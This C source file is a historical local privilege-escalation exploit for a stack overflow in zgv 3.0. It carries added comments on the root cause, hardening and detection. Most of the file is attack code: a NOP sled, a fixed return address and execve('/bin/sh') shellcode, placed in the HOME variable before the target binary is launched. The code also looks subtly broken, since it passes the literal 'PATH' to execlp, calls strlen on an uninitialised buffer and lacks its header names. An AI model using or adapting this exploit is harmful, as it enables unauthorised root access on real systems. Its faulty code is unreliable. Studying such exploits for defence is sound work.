/*
 * zgv 3.0 local linux sample exploit by slash / buffer0verfl0w security
 * Initial exploit version by Mixter
 *
 * Historical (2000) proof-of-concept for a stack-based buffer overflow in
 * zgv. The program builds an over-long string, installs it as the HOME
 * environment variable and then launches /usr/bin/zgv (presumably a setuid
 * binary at the time — not shown here). The vulnerable copy itself is not
 * on this page; from the construction below it is assumed to copy HOME into
 * a fixed-size stack buffer without a length check.
 *
 * Defensive reading:
 *  - Root cause class: unbounded copy of an environment value into a
 *    fixed-size buffer. The fix on the target side is a bounded copy
 *    (snprintf or an explicit length check against the destination size)
 *    and treating every environment value as untrusted input.
 *  - Compiler/OS hardening (stack protector, ASLR, non-executable stack)
 *    defeats the fixed return address and NOP-sled technique used here.
 *  - Detection: unusually long environment variables handed to privileged
 *    binaries, and crash telemetry (segfaults) from those binaries.
 */
#include /* header name not present in this copy of the page */
#include /* header name not present in this copy of the page */

#define NOPS 0x90 // No operation instruction (x86 nop byte used as the sled)
#define BUFLEN 1032 // Our buffer size
#define RETADDR 0xbffff574 // Change this if it doesn't suit your needs (fixed stack address; only meaningful on a pre-ASLR 32-bit layout)
#define PATH "/usr/bin/zgv" // Path to the program

// Payload bytes stored as a string: execve("/bin/sh");
char shellcode[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*
 * Entry point: builds the overflow string, places it in HOME and runs the
 * target. Returns 0 if exec does not take over the process.
 */
int main()
{
    char buf[BUFLEN];
    long retaddr = RETADDR;
    int i;

    // Banner; echoes the fixed constants above.
    printf("######################################\n");
    printf("# zgv 3.0 local linux sample exploit #\n");
    printf("# by slash / buffer0verfl0w security #\n");
    printf("######################################\n");
    printf("# Using return address 0x%lx\n",retaddr);
    printf("# Using buffer size %d\n", strlen(buf));

    // Build the overflow string: every 4-byte slot holds the return
    // address (assumes a 32-bit long — TODO confirm target ABI).
    for (i = 0; i < BUFLEN; i += 4)
        *(long *) &buf[i] = retaddr;

    // Copy the NOPS in to the buffer leaving space for
    // the shellcode (the last 100 bytes keep the return-address slots).
    memset(buf, NOPS, BUFLEN - strlen(shellcode) - 100);

    // Copy the shellcode into the buffer, directly after the NOP sled.
    memcpy(buf + (BUFLEN - strlen(shellcode) - 100), shellcode, strlen(shellcode));

    // The crafted string becomes the HOME value the target will read.
    setenv("HOME", buf, 1);

    // Execute the program with the modified environment inherited.
    execlp("PATH", "zgv", 0);

    return 0;
}

/* www.hack.co.za [5 September 2000]*/